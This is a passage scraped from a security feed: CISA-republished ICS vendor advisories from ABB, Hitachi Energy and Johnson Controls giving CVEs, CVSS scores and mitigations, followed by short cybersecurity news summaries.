exploited on all devices or across all customer applications. Extensive investigations by B&R have determined that shorter cycle times in customer projects increase the likelihood of potential exploitation. For customers unable to transition to a patched version, adjusting their application configuration to longer cycle times may therefore be considered as a mitigating measure. B&R Automation Runtime is designed to be operated on Level 1 of the ABB ICS Cyber Security Reference Architecture. Exploitation of the vulnerability from outside Level 1 would require an attacker to bypass the Control Network Firewall. Limiting the maximum data traffic and the maximum number of concurrent connections to the ANSL server of Automation Runtime on the Control Network Firewall, shall be considered to mitigate this vulnerability. B&R further recommends, in alignment with its Defense in Depth for B&R Products guidelines, that customers: - Test the maximum load capacity of their application under Automation Runtime before commissioning. - Restrict the permitted data traffic to the device via the Control Network Firewall to no more than 80% of the measured peak traffic value. Refer to section “General security recommendations” for further advise on how to keep your system secure. Relevant CWE: CWE-770 Allocation of Resources Without Limits or Throttling Metrics CVSS Version Base Score Base Severity Vector String 3.1 6.8 MEDIUM CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:N/A:H/RL:O/RC:C Acknowledgments ABB PSIRT reported this vulnerability to CISA. Notice The information in this document is subject to change without notice, and should not be construed as a commitment by B&R. B&R provides no warranty, express or implied, including warranties of merchantability and fitness for a particular purpose, for the information contained in this document, and assumes no responsibility for any errors that may appear in this document. In no event shall B&R or any of its suppliers be liable for direct, indirect, special, incidental or conse-quential damages of any nature or kind arising from the use of this document, or from the use of any hardware or software described in this document, even if B&R or its suppliers have been advised of the possibility of such damages. This document and parts hereof must not be reproduced or copied without written permission from B&R, and the contents hereof must not be imparted to a third party nor used for any unauthorized purpose. All rights to registrations and trademarks reside with their respective owners. Frequently Asked Questions What causes the vulnerability? - The vulnerability is caused by insufficient throttling and limiting mechanism in the ANSL Server used the B&R Automation Runtime. What might an attacker use the vulnerability to do? - An attacker who successfully exploited this vulnerability could cause the affected system node to stop. How could an attacker exploit the vulnerability? - An attacker could try to exploit the vulnerability by creating a specially crafted message and sending the message to an affected system node. This would require that the attacker has access to the system network, by connecting to the net-work either directly or through a wrongly configured or penetrated firewall, or that he installs malicious software on a system node or otherwise infects the network with malicious software. Recommended practices help mitigate such attacks, see section Mitigating Factors above. Could the vulnerability be exploited remotely? - Yes, an attacker who has network access to an affected system node could exploit this vulnerability. Recommended practices include that process control systems are physically protected, have no direct connections to the Internet, and are separated from other networks by means of a firewall system that has a minimal number of ports exposed. What does the update do? - The update removes the vulnerability by limiting incoming network traffic that is handled by the ANSL server component. When this security advisory was issued, had this vulnerability been publicly disclosed? - No, B&R discovered this vulnerability as a part of its own security analysis. When this security advisory was issued, had B&R received any reports that this vulnerability was being exploited? - No, B&R had not received any information indicating that this vulnerability had been exploited when this security advisory was originally issued. Legal Notice and Terms of Use This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy). Recommended Practices CISA recommends users take defensive measures to minimize the exploitation risk of these vulnerabilities. Minimize network exposure for all control system devices and/or systems, and ensure they are not accessible from the internet. Locate control system networks and remote devices behind firewalls and isolate them from business networks. When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most recent version available. Also recognize VPN is only as secure as its connected devices. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents. Advisory Conversion Disclaimer This ICSA is a verbatim republication of ABB PSIRT SA25P005 from a direct conversion of the vendor's Common Security Advisory Framework (CSAF) advisory. This is republished to CISA's website as a means of increasing visibility and is provided "as-is" for informational purposes only. CISA is not responsible for the editorial or technical accuracy of republished advisories and provides no warranties of any kind regarding any information contained within this advisory. Further, CISA does not endorse any commercial product or service. Please contact ABB PSIRT directly for any questions regarding this advisory. Revision History Initial Release Date: 2026-01-19 Date Revision Summary 2026-01-19 1 Initial version. 2026-05-05 2 Initial CISA Republication of ABB PSIRT SA25P005 advisory Legal Notice and Terms of Use

View CSAF Summary Hitachi Energy is aware of a vulnerability that affects the Hitachi Energy PCM600 product versions listed in this document. An attacker successfully exploiting this vulnerability can impact integrity of the product. Please refer to the Recommended Immediate Actions for information about the mitigation/remediation. The following versions of Hitachi Energy PCM600 are affected: PCM600 Legacy vers:PCM600_Legacy/<=2.11 (CVE-2018-1002208) PCM600 3.0, 3.0_HF1, 3.0_HF2, 3.0_HF3, 3.1, 3.1_SP1, 3.1_SP2, 3.1_SP3 (CVE-2018-1002208, CVE-2018-1002208, CVE-2018-1002208, CVE-2018-1002208, CVE-2018-1002208, CVE-2018-1002208, CVE-2018-1002208, CVE-2018-1002208) CVSS Vendor Equipment Vulnerabilities v3 4.4 Hitachi Energy Hitachi Energy PCM600 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') Background Critical Infrastructure Sectors: Energy Countries/Areas Deployed: Worldwide Company Headquarters Location: Switzerland Vulnerabilities Expand All + CVE-2018-1002208 SharpZipLib before 1.0 RC1 is vulnerable to directory traversal, allowing attackers to write to arbitrary files via a ../ (dot dot slash) in a Zip archive entry that is mishandled during extraction. This vulnerability is also known as 'Zip-Slip'. View CVE Details Affected Products Hitachi Energy PCM600 Vendor: Hitachi Energy Product Version: PCM600 Legacy Version 2.11 and earlier, PCM600 3.0, PCM600 3.0 HF1, PCM600 3.0 HF2, PCM600 3.0 HF3, PCM600 3.1, PCM600 3.1 SP1, PCM600 3.1 SP2, PCM600 3.1 SP3 Product Status: known_affected Remediations None available Prior to acquisition, PCM600 product versions 2.11 and earlier were distributed under ABB’s organization. Some Hitachi Energy users may still be operating these legacy versions. While ABB continues to maintain the PCM600 2.x product line, Hitachi Energy now exclusively maintains and distributes the PCM600 3.x product line. ABB has recently published a cybersecurity advisory [2NGA002813] (https://library.e.abb.com/public/ec33308ad2c34f92bab09df09c66954d/2NGA002813_PCM600_Sharpziplib_Vulnerability.pdf) with their recommended actions for this same vulnerability. However, because Hitachi Energy does not maintain or validate the PCM600 2.x releases, they cannot assess or guarantee the compatibility of ABB’s recommended updates with other Hitachi Energy IEDs (Relion 670 series, 650 series, SAM600, PWC600). PCM600 versions 3.0, and later are the Hitachi Energy maintained and validated versions, Hitachi Energy strongly recommends users to migrate to these versions. Additionally, please follow Hitachi Energy's [Industrial Control Systems Best Practices,](https://publisher.hitachienergy.com/preview?DocumentID=8DBD000235&LanguageCode=en&DocumentPartId=&Action=Launch) until the planned remediation is released. Contact your support representative for more detailed guidance tailored to your deployment. Mitigation Ensure that Chapter 4 of Cyber Security Deployment Guideline - 1MRK505410 has been followed during the deployment. Ensure that no default credentials are in use. In case of exceptions, please ensure they have been mitigated with adequate countermeasures. Vendor fix Update to PCM600 3.1 SP4 (Update Planned) Relevant CWE: CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') Metrics CVSS Version Base Score Base Severity Vector String 3.1 4.4 MEDIUM CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:N/I:H/A:N Acknowledgments Hitachi Energy reported this vulnerability to CISA. Notice The information in this document is subject to change without notice and should not be construed as a commitment by Hitachi Energy. Hitachi Energy provides no warranty, express or implied, including warranties of merchantability and fitness for a particular purpose, for the information contained in this document, and assumes no responsibility for any errors that may appear in this document. In no event shall Hitachi Energy or any of its suppliers be liable for direct, indirect, special, incidental or consequential damages of any nature or kind arising from the use of this document, or from the use of any hardware or software described in this document, even if Hitachi Energy or its suppliers have been advised of the possibility of such damages. This document and parts hereof must not be reproduced or copied without written permission from Hitachi Energy and the contents hereof must not be imparted to a third party nor used for any unauthorized purpose. All rights to registrations and trademarks reside with their respective owners. Support For additional information and support please contact your product provider or Hitachi Energy service organization. For contact information, see https://www.hitachienergy.com/contact-us/ for Hitachi Energy contact-centers. General Mitigation Factors It is highly recommended to deploy the product following the “PCM600 3.1 Cyber Security Deployment Guideline” document. Customers should maintain their systems with products running on supported versions and follow maintenance releases. Recommended security practices and firewall configurations can help protect a process control network from attacks that originate from outside the network. Such practices include that process control systems are physically protected from direct access by unauthorized personnel, have no direct connections to the Internet, and are separated from other networks by means of a firewall system that has a minimal number of ports exposed, and others that have to be evaluated case by case. Process control systems should not be used for Internet surfing, instant messaging, or receiving e-mails. Portable computers and removable storage media should be carefully scanned for viruses before they are connected to a control system. SSVC SSVCv2/E:N/A:N/2026-04-24T14:16:01Z/ Legal Notice and Terms of Use This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy). Recommended Practices CISA recommends users take defensive measures to minimize the exploitation risk of these vulnerabilities. Minimize network exposure for all control system devices and/or systems, and ensure they are not accessible from the internet. Locate control system networks and remote devices behind firewalls and isolate them from business networks. When remote access is required, use more secure methods, such as virtual private networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most recent version available. Also recognize VPN is only as secure as its connected devices. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents. Advisory Conversion Disclaimer This ICSA is a verbatim republication of Hitachi Energy 8DBD000239 from a direct conversion of the vendor's Common Security Advisory Framework (CSAF) advisory. This is republished to CISA's website as a means of increasing visibility and is provided "as-is" for informational purposes only. CISA is not responsible for the editorial or technical accuracy of republished advisories and provides no warranties of any kind regarding any information contained within this advisory. Further, CISA does not endorse any commercial product or service. Please contact Hitachi Energy directly for any questions regarding this advisory. Revision History Initial Release Date: 2026-04-28 Date Revision Summary 2026-04-28 1 Initial public release 2026-05-05 2 Initial CISA Republication of Hitachi Energy 8DBD000239 advisory Legal Notice and Terms of Use

View CSAF Summary Successful exploitation of this vulnerability could allow a standard user to escalate privileges on the host machine. The following versions of Johnson Controls CEM AC2000 are affected: CEM AC2000 12.0 (CVE-2026-21661) CEM AC2000 11.0 (CVE-2026-21661) CEM AC2000 10.6 (CVE-2026-21661) CVSS Vendor Equipment Vulnerabilities v3 8.7 Johnson Controls Inc. Johnson Controls CEM AC2000 Uncontrolled Search Path Element Background Critical Infrastructure Sectors: Critical Manufacturing, Commercial Facilities, Government Services and Facilities, Transportation Systems, Energy Countries/Areas Deployed: Worldwide Company Headquarters Location: Ireland Vulnerabilities Expand All + CVE-2026-21661 The affected product is vulnerable to DLL hijacking, which could allow an attacker to escalate standard user privileges on the host machine. View CVE Details Affected Products Johnson Controls CEM AC2000 Vendor: Johnson Controls Inc. Product Version: Johnson Controls Inc. CEM AC2000: 12.0, Johnson Controls Inc. CEM AC2000: 11.0, Johnson Controls Inc. CEM AC2000: 10.6 Product Status: known_affected Remediations Mitigation Johnson Controls recommends users apply the following mitigations: Mitigation Upgrade CEM AC 2000 12.0 to 12.0 Release 10. Mitigation Upgrade CEM AC 2000 11.0 to 11.0 Release 9. Mitigation Upgrade CEM AC 2000 10.6 to 10.6 Release 3. Mitigation For more detailed mitigation instructions, please see Johnson Controls Product Security Advisory. https://www.johnsoncontrols.com/trust-center/cybersecurity/security-advisories Relevant CWE: CWE-427 Uncontrolled Search Path Element Metrics CVSS Version Base Score Base Severity Vector String 3.1 8.7 HIGH CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:L Acknowledgments Tom Hulme of CSACyber reported this vulnerability to Johnson Controls Legal Notice and Terms of Use This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy). Recommended Practices CISA recommends users take defensive measures to minimize the risk of exploitation of this vulnerability. Minimize network exposure for all control system devices and/or systems, ensuring they are not accessible from the internet. Locate control system networks and remote devices behind firewalls and isolating them from business networks. When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize VPN is only as secure as the connected devices. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov/ics. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov/ics in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents. CISA also recommends users take the following measures to protect themselves from social engineering attacks: Do not click web links or open attachments in unsolicited email messages. Refer to Recognizing and Avoiding Email Scams for more information on avoiding email scams. Refer to Avoiding Social Engineering and Phishing Attacks for more information on social engineering attacks. No known public exploitation specifically targeting this vulnerability has been reported to CISA at this time. This vulnerability is not exploitable remotely. Revision History Initial Release Date: 2026-05-05 Date Revision Summary 2026-05-05 1 Initial Republication of Johnson Controls product security advisory. Legal Notice and Terms of Use

View CSAF Summary ABB became aware of vulnerability in the product versions listed as affected in the advisory. An update is now available that addresses and remediates the vulnerability. An attacker who successfully exploited this vulnerability could read sensitive information in the logging data of the PVI client application. Logging is deactivated by default in all PVI client versions. The following versions of ABB B&R PVI are affected: PVI <6.5.0, 6.5.0 (CVE-2026-0936) CVSS Vendor Equipment Vulnerabilities v3 5 ABB ABB B&R PVI Insertion of Sensitive Information into Log File Background Critical Infrastructure Sectors: Energy Countries/Areas Deployed: Worldwide Company Headquarters Location: Switzerland Vulnerabilities Expand All + CVE-2026-0936 An Insertion of Sensitive Information into Log File vulnerability in B&R PVI client versions prior to 6.5 may be abused by an authenticated local attacker to gather credential information which is processed by the PVI client application. The logging function of the PVI client application is disabled by default and must be explicitly enabled by the user. View CVE Details Affected Products ABB B&R PVI Vendor: ABB Product Version: ABB PVI <6.5.0 Product Status: fixed, known_affected Remediations Vendor fix The problem is corrected in the following product versions: - PVI 6.5.0 Please note that PVI is included in the Automation Studio installation package and shares the same version number as the corresponding Automation Studio release. B&R recommends that customers apply the update at earliest convenience. The process to install updates is described in the user manual. The step to identify the installed product version is described in the user manual. Mitigation This vulnerability is limited to the PVI client side application logging and does not impact any security related logging of the PVI server component. Logging is not enabled by default for PVI client applications. Activate logging on the client system only when it is required for troubleshooting, debugging or analysis. Ensure that all client side logging information is securely deleted after it is no longer needed. When enabling logging in PVI client applications, the storage path for the log files must be specified. Make sure that only the respective user has access to the directories where the logging information is stored. Refer to section “General security recommendations” for further advise on how to keep your system secure. Relevant CWE: CWE-532 Insertion of Sensitive Information into Log File Metrics CVSS Version Base Score Base Severity Vector String 3.1 5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N/E:U/RL:O/RC:C Acknowledgments ABB PSIRT reported this vulnerability to CISA. Notice The information in this document is subject to change without notice, and should not be construed as a commitment by B&R. B&R provides no warranty, express or implied, including warranties of merchantability and fitness for a particular purpose, for the information contained in this document, and assumes no responsibility for any errors that may appear in this document. In no event shall B&R or any of its suppliers be liable for direct, indirect, special, incidental or consequential damages of any nature or kind arising from the use of this document, or from the use of any hardware or software described in this document, even if B&R or its suppliers have been advised of the possibility of such damages. This document and parts hereof must not be reproduced or copied without written permission from B&R, and the contents hereof must not be imparted to a third party nor used for any unauthorized purpose. All rights to registrations and trademarks reside with their respective owners. Legal Notice and Terms of Use This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy). Recommended Practices CISA recommends users take defensive measures to minimize the exploitation risk of these vulnerabilities. Minimize network exposure for all control system devices and/or systems, and ensure they are not accessible from the internet. Locate control system networks and remote devices behind firewalls and isolate them from business networks. When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most recent version available. Also recognize VPN is only as secure as its connected devices. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents. Advisory Conversion Disclaimer This ICSA is a verbatim republication of ABB PSIRT SA26P001 from a direct conversion of the vendor's Common Security Advisory Framework (CSAF) advisory. This is republished to CISA's website as a means of increasing visibility and is provided "as-is" for informational purposes only. CISA is not responsible for the editorial or technical accuracy of republished advisories and provides no warranties of any kind regarding any information contained within this advisory. Further, CISA does not endorse any commercial product or service. Please contact ABB PSIRT directly for any questions regarding this advisory. Revision History Initial Release Date: 2026-01-29 Date Revision Summary 2026-01-29 1 Initial version. 2026-05-05 2 Initial CISA Republication of ABB PSIRT SA26P001 advisory Legal Notice and Terms of Use

View CSAF Summary ABB became aware of vulnerability in the product versions listed as affected in the advisory. An update is available that resolves a vulnerability. Successful exploitation of this vulnerability may enable an attacker to masquerade as a trusted party when B&R Automation Studio establishes a connection with a server via the ANSL over TLS or OPC-UA protocol. The following versions of ABB B&R Automation Studio are affected: Automation Studio <6.5, 6.5 (CVE-2025-11043) CVSS Vendor Equipment Vulnerabilities v3 7.4 ABB ABB B&R Automation Studio Improper Certificate Validation Background Critical Infrastructure Sectors: Critical Manufacturing Countries/Areas Deployed: Worldwide Company Headquarters Location: Switzerland Vulnerabilities Expand All + CVE-2025-11043 An Improper Certificate Validation vulnerability in the OPC-UA client and ANSL over TLS client used in Automation Studio versions before 6.5 could allow an unauthenticated attacker on the network to position themselves to intercept and interfere with data exchanges. View CVE Details Affected Products ABB B&R Automation Studio Vendor: ABB Product Version: ABB Automation Studio <6.5 Product Status: fixed, known_affected Remediations Vendor fix The problem is corrected in the following product versions: B&R Automation Studio version 6.5 B&R recommends that customers apply the update at earliest convenience. The process to install updates is described in the user manual. The step to identify the installed product version is de-scribed in the user manual. Mitigation To exploit this vulnerability, an attacker would need to intercept and redirect the communication between B&R Automation Studio and the target server, as well as present manipulated certificates that pass validation checks. B&R recommends operating B&R Automation Studio within Level 2 of the ABB ICS Cyber Security Reference Architecture when connecting to Level 1 devices via ANSL over TLS or OPC-UA. Operating in this trusted environment reduces the risk of successful exploitation drastically. Refer to section “General security recommendations” for further advise on how to keep your system secure. Relevant CWE: CWE-295 Improper Certificate Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.4 HIGH CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N/RL:O/RC:C Acknowledgments ABB PSIRT reported this vulnerability to CISA. Notice The information in this document is subject to change without notice, and should not be construed as a commitment by B&R. B&R provides no warranty, express or implied, including warranties of merchantability and fitness for a particular purpose, for the information contained in this document, and assumes no responsibility for any errors that may appear in this document. In no event shall B&R or any of its suppliers be liable for direct, indirect, special, incidental or conse-quential damages of any nature or kind arising from the use of this document, or from the use of any hardware or software described in this document, even if B&R or its suppliers have been advised of the possibility of such damages. This document and parts hereof must not be reproduced or copied without written permission from B&R, and the contents hereof must not be imparted to a third party nor used for any unauthorized purpose. All rights to registrations and trademarks reside with their respective owners. Frequently Asked Questions What causes the vulnerability? - The vulnerability is caused by insufficient validation mechanisms for server certificates in the ANSL over TLS and OPC-UA client implementations. What is B&R Automation Studio? - B&R Automation Studio is an environment for developing and executing automation solutions, ranging from control and motion technology to HMI, operation, and integrated safety technology. What might an attacker use the vulnerability to do? - An attacker who successfully exploited this vulnerability could spoof a trusted server, potentially leading to the disclosure of confidential information or the alteration of data during transit. How could an attacker exploit the vulnerability? - An attacker could attempt to exploit this vulnerability by generating a maliciously crafted server certificate and manipulating network routing or name resolution to redirect traffic through a compromised node under their control. This would require that the attacker has access to the system network, by connecting to the network either directly or through a wrongly configured or penetrated firewall, or that he installs malicious software on a system node or other-wise infects the network with malicious software. Recommended practices help mitigate such attacks, see section Miti-gating Factors above. Could the vulnerability be exploited remotely? - Yes, an attacker who has network access to an affected system node could exploit this vulnerability. Recommended practices include that process control systems are physically protected, have no direct connections to the Internet, and are separated from other networks by means of a firewall system that has a minimal number of ports exposed. What does the update do? - The update removes the vulnerability by modifying the way that the ANSL and OPC-UA clients are validating server certificates. When this security advisory was issued, had this vulnerability been publicly disclosed? - No, B&R discovered this vulnerability as a part of its own security analysis. When this security advisory was issued, had B&R received any reports that this vulnerability was being exploited? - No, B&R had not received any information indicating that this vulnerability had been exploited when this security advisory was originally issued Legal Notice and Terms of Use This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy). Recommended Practices CISA recommends users take defensive measures to minimize the exploitation risk of these vulnerabilities. Minimize network exposure for all control system devices and/or systems, and ensure they are not accessible from the internet. Locate control system networks and remote devices behind firewalls and isolate them from business networks. When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most recent version available. Also recognize VPN is only as secure as its connected devices. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents. Advisory Conversion Disclaimer This ICSA is a verbatim republication of ABB PSIRT SA25P004 from a direct conversion of the vendor's Common Security Advisory Framework (CSAF) advisory. This is republished to CISA's website as a means of increasing visibility and is provided "as-is" for informational purposes only. CISA is not responsible for the editorial or technical accuracy of republished advisories and provides no warranties of any kind regarding any information contained within this advisory. Further, CISA does not endorse any commercial product or service. Please contact ABB PSIRT directly for any questions regarding this advisory. Revision History Initial Release Date: 2026-01-19 Date Revision Summary 2026-01-19 1 Initial Version 2026-05-05 2 Initial CISA Republication of ABB PSIRT SA25P004 advisory Legal Notice and Terms of Use

Google overhauls its Android and Chrome vulnerability rewards programs, offering bounties of up to $1.5 million for the most difficult exploits while scaling back payouts for flaws that artificial intelligence (AI) has made easier to find. [...]

A Latvian national extradited to the United States was sentenced to 8.5 years in prison for his "cold case" negotiator role in the Russian Karakurt ransomware group. [...]

A new version of the CloudZ remote access tool (RAT) is deploying a previously unseen malicious plugin called Pheno that hijacks the Microsoft Phone Link connection to steal sensitive codes from mobile devices. [...]

The North Korean hacker group APT37 has been delivering an Android version of a backdoor called BirdCall in a supply-chain attack through a video game platform. [...]

U.S. cybersecurity agency CISA says the CopyFail bug is being actively used in hacking campaigns, and poses a major risk to servers and data centers that rely on Linux.

Hackers have been exploiting a critical vulnerability (CVE-2026-22679) in the Weaver E-cology office automation since mid-March to run discovery commands. [...]

Cargo theft is no longer about small groups of criminals operating on the ground, but transnational cybercriminal syndicates using access to supply chain systems to reroute goods.

Attackers are abusing two remote monitoring and management (RMM) tools to evade detection in a campaign that has impacted over 80 organizations so far.

Shortly after the authentication-bypass flaw was disclosed multiple proof-of-concept exploits appeared, and one researcher claims there's been zero-day activity for at least a month.

Days after the disclosure of a critical vulnerability in popular web hosting software cPanel and WHM, hackers are now targeting and hacking thousands of vulnerable websites.

Cybersecurity firm Trellix disclosed a data breach after attackers gained access to "a portion" of its source code repository. [...]

A vulnerability has been discovered in WHM, cPanel, and WP Squared that could allow for remote code execution. WHM, cPanel, and WP Squared are Linux-based web hosting control panels for server and website management. While WHM provides server-level control, cPanel provides administrator access to the website backend, webmail, and databases. Successful exploitation could allow unauthenticated remote attackers to bypass authentication and gain unauthorized administrative access to the affected systems, ultimately leading to remote code execution.

More than 1,600 socially engineered messages from the China-backed advanced persistent threat (APT) group target various sectors to deliver the previously undocumented ABCDoor backdoor, ValleyRAT, and other malware.

Fraudsters aren't hacking credit unions, they are exploiting normal business processes. Flare reveals how structured loan fraud methods use stolen identities to pass verification and secure funds. [...]

Cloudfoxable started as a hands-on AWS security training tool. Now it's expanding. Bishop Fox has launched the first set of Azure challenges, giving security professionals a safe, intentionally misconfigured environment to explore identity-driven attack paths and privilege escalation in Azure.

Progress Software warned customers to patch a critical authentication bypass vulnerability in its MOVEit Automation enterprise-grade managed file transfer (MFT) application. [...]

Security breaches don't just test your defenses—they test your recovery. Join Kaseya in our upcoming webinar to learn how MSPs strengthen resilience with SaaS backups and BCDR to stay operational after attacks. [...]

North Korean threat actors are pulling off historic cryptocurrency heists on a yearly, sometimes weekly basis now. AI might be helping them.

CISA has added one new vulnerability to its Known Exploited Vulnerabilities (KEV) Catalog, based on evidence of active exploitation. CVE-2026-31431 Linux Kernel Incorrect Resource Transfer Between Spheres Vulnerability This type of vulnerability is a frequent attack vector for malicious cyber actors and poses significant risks to the federal enterprise. Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities established the KEV Catalog as a living list of known Common Vulnerabilities and Exposures (CVEs) that carry significant risk to the federal enterprise. BOD 22-01 requires Federal Civilian Executive Branch (FCEB) agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the BOD 22-01 Fact Sheet for more information. Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of KEV Catalog vulnerabilities as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the catalog that meet the specified criteria.

Several npm packages for SAP's cloud application development ecosystem have been compromised as TeamPCP's supply chain attacks broaden.

The proof-of-concept exploit code runs only 10 lines long, but luckily, a patch is already available.

In this latest installment of the Reporters' Notebook video series, we discuss how the new AI model threatens to completely upend cybersecurity, and what industry leaders are telling the press.

The U.S. Federal Bureau of Investigation (FBI) warned the transportation and logistics industry of a sharp rise in cyber-enabled cargo theft, with estimated losses in the United States and Canada reaching nearly $725 million in 2025. [...]

Bitcoin price action risked repeating January's breakdown despite April being poised to offer the best monthly BTC price gains in a year.

A Brazilian tech firm that specializes in protecting networks from distributed denial-of-service (DDoS) attacks has been enabling a botnet responsible for an extended campaign of massive DDoS attacks against other network operators in Brazil, KrebsOnSecurity has learned. The firm's chief executive says the malicious activity resulted from a security breach and was likely the work of a competitor trying to tarnish his company's public image.

When a new asset goes live, attackers start scanning within minutes. Sprocket Security shows how automated attacks move from discovery to compromise in under 24 hours. [...]

An exploit has been published for a local privilege escalation vulnerability dubbed "Copy Fail" that impacts Linux kernels released since 2017, allowing an unprivileged local attacker to gain root permissions. [...]

View CSAF Summary Successful exploitation of these vulnerabilities could allow an attacker to remotely reboot the device or complete an unauthenticated query to reveal system configuration, including sensitive details. The following versions of ABB AWIN Gateways are affected: ABB AWIN Firmware (2.0-0) installed on ABB AWIN GW100 rev.2 2.0-0  ABB AWIN Firmware (2.0-1) installed on ABB AWIN GW100 rev.2 2.0-1  ABB AWIN Firmware (1.2-0) installed on ABB AWIN GW120 1.2-0  ABB AWIN Firmware (1.2-1) installed on ABB AWIN GW120 1.2-1  CVSS Vendor Equipment Vulnerabilities v3 8.3 ABB ABB AWIN Gateways Authentication Bypass by Capture-replay, Missing Authentication for Critical Function Background Critical Infrastructure Sectors: Critical Manufacturing Countries/Areas Deployed: Worldwide Company Headquarters Location: Switzerland Vulnerabilities Expand All + CVE-2025-13777 An unauthenticated query reveals data. Authentication Bypass due to Improper Session Validation. View CVE Details Affected Products ABB AWIN Gateways Vendor: ABB Product Version: ABB ABB AWIN Firmware (2.0-0) installed on ABB AWIN GW100 rev.2: 2.0-0, ABB ABB AWIN Firmware (2.0-1) installed on ABB AWIN GW100 rev.2: 2.0-1, ABB ABB AWIN Firmware (1.2-0) installed on ABB AWIN GW120: 1.2-0, ABB ABB AWIN Firmware (1.2-1) installed on ABB AWIN GW120: 1.2-1 Product Status: known_affected Remediations Mitigation The following product versions have been fixed: ABB AWIN Firmware 2.1-0 installed on ABB AWIN GW100 rev. 2 (Product ID: 3BNP102988R1) are fixed versions for CVE-2025-13777 ABB AWIN Firmware2.0-0 installed on ABB AWIN GW120 (Product ID 3BNP103003R1) are fixed versions for CVE-2025-13777 Mitigation For more information see the associated ABB PSIRT security advisory 4JNO000329 ABB CYBERSECURITY ADVISORY - PDF Version https://search.abb.com/library/Download.aspx?DocumentID=4JNO000329&LanguageCode=en&DocumentPartId=&Action=Launch, ABB CYBERSECURITY ADVISORY - CSAF Version https://psirt.abb.com/csaf/2026/4jno000329.json. https://search.abb.com/library/Download.aspx?DocumentID=4JNO000329&LanguageCode=en&DocumentPartId=&Action=Launch Mitigation For more information see the associated ABB PSIRT security advisory 4JNO000329 ABB CYBERSECURITY ADVISORY - PDF Version https://search.abb.com/library/Download.aspx?DocumentID=4JNO000329&LanguageCode=en&DocumentPartId=&Action=Launch, ABB CYBERSECURITY 